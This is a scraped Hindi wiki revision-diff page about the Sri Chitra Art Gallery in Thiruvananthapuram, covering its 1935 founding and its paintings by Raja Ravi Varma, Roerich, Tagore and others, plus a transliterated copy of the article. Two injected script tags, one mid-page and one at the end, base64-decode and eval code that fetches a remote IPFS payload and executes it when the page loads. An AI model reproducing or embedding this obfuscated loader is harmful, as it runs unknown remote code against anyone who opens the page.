Difference between revisions of "श्रीचित्रा कला दीर्घा तिरुअनंतपुरम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
m (Text replacement - " महान " to " महान् ")
 
(4 intermediate revisions by 3 users not shown)
Line 4: Line 4:
 
|ज़िला= तिरुअनंतपुरम ज़िला
 
|ज़िला= तिरुअनंतपुरम ज़िला
 
}}
 
}}
*[[केरल]] की राजधानी [[तिरुअनंतपुरम]] में कई [[तिरुअनंतपुरम पर्यटन|पर्यटन स्थल]] हैं जिनमें से एक श्रीचित्रा कला दीर्घा हैं।
+
'''श्रीचित्रा कला दीर्घा''' [[केरल]] की राजधानी [[तिरुअनंतपुरम]] में [[नेपियर संग्रहालय]] के निकट ही स्थित है।  
*श्रीचित्रा कला दीर्घा [[नेपियर संग्रहालय तिरुअनंतपुरम|नेपियर संग्रहालय]] के निकट ही स्थित है।  
+
*[[1935]] में स्थापित इस दीर्घा का भवन भी उत्कृष्ट वास्तुशिल्प वाला है।  
*1935 में स्थापित इस दीर्घा का भवन भी उत्कृष्ट वास्तुशिल्प वाला है।  
+
*यह कला दीर्घा कला प्रेमियों के लिए प्रेरणा का स्रोत है।  
*यह कला दीर्घा कला प्रेमियों के लिए प्रेरणा का स्त्रोत है।  
+
*इसके संग्रह में [[राजा रवि वर्मा]], निकोलस रोरिक, स्वेतलोबा, [[रवींद्रनाथ टैगोर]], [[जैमिनी राय]] जैसे महान् कलाकारों के चित्र देखने को मिलते हैं।  
*इसके संग्रह में [[राजा रवि वर्मा]], [[निकोलस रोरिक]], [[स्वेतलोबा]], [[रवींद्रनाथ टैगोर]], [[जैमिनी राय]] जैसे महान कलाकारों के चित्र देखने को मिलते हैं।  
+
*इस दीर्घा में [[चित्रकला राजपूत शैली|राजपूत]] एवं [[चित्रकला मुग़ल शैली|मुग़ल शैली]] के लघु चित्र तथा तंजौर शैली के चित्र भी प्रदर्शित हैं।
*इस दीर्घा में [[चित्रकला राजपूत शैली|राजपूत]] एवं [[चित्रकला मुग़ल शैली|मुग़ल शैली]] के लघु चित्र तथा [[चित्रकला तंजौर शैली|तंजौर शैली]] के चित्र भी प्रदर्शित हैं।
+
*ऐसे अमूल्य चित्र संग्रह के साथ ही इस दीर्घा में [[जापान]], [[चीन]], [[तिब्बत]] एवं इंडोनेशिया आदि देशों के चित्र भी देखने लायक़ हैं।
*ऐसे अमूल्य चित्र संग्रह के साथ ही इस दीर्घा में [[जापान]], [[चीन]], [[तिब्बत]] एवं [[इंडोनेशिया]] आदि देशों के चित्र भी देखने लायक हैं।
+
 
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{केरल के पर्यटन स्थल}}
 
{{केरल के पर्यटन स्थल}}
[[Category:केरल]]
+
[[Category:केरल]][[Category:केरल के पर्यटन स्थल]][[Category:तिरुअनंतपुरम]][[Category:पर्यटन कोश]]
[[Category:केरल के पर्यटन स्थल]]
 
[[Category:तिरुअनंतपुरम]]
 
[[Category:पर्यटन कोश]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 11:15, 1 August 2017

tiruanantapuram tiruanantapuram paryatan tiruanantapuram zila

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shrichitra kala dirgha keral ki rajadhani tiruanantapuram mean nepiyar sangrahalay ke nikat hi sthit hai.

  • 1935 mean sthapit is dirgha ka bhavan bhi utkrisht vastushilp vala hai.
  • yah kala dirgha kala premiyoan ke lie prerana ka srot hai.
  • isake sangrah mean raja ravi varma, nikolas rorik, svetaloba, raviandranath taigor, jaimini ray jaise mahanh kalakaroan ke chitr dekhane ko milate haian.
  • is dirgha mean rajapoot evan mugal shaili ke laghu chitr tatha tanjaur shaili ke chitr bhi pradarshit haian.
  • aise amooly chitr sangrah ke sath hi is dirgha mean japan, chin, tibbat evan iandoneshiya adi deshoan ke chitr bhi dekhane layaq haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>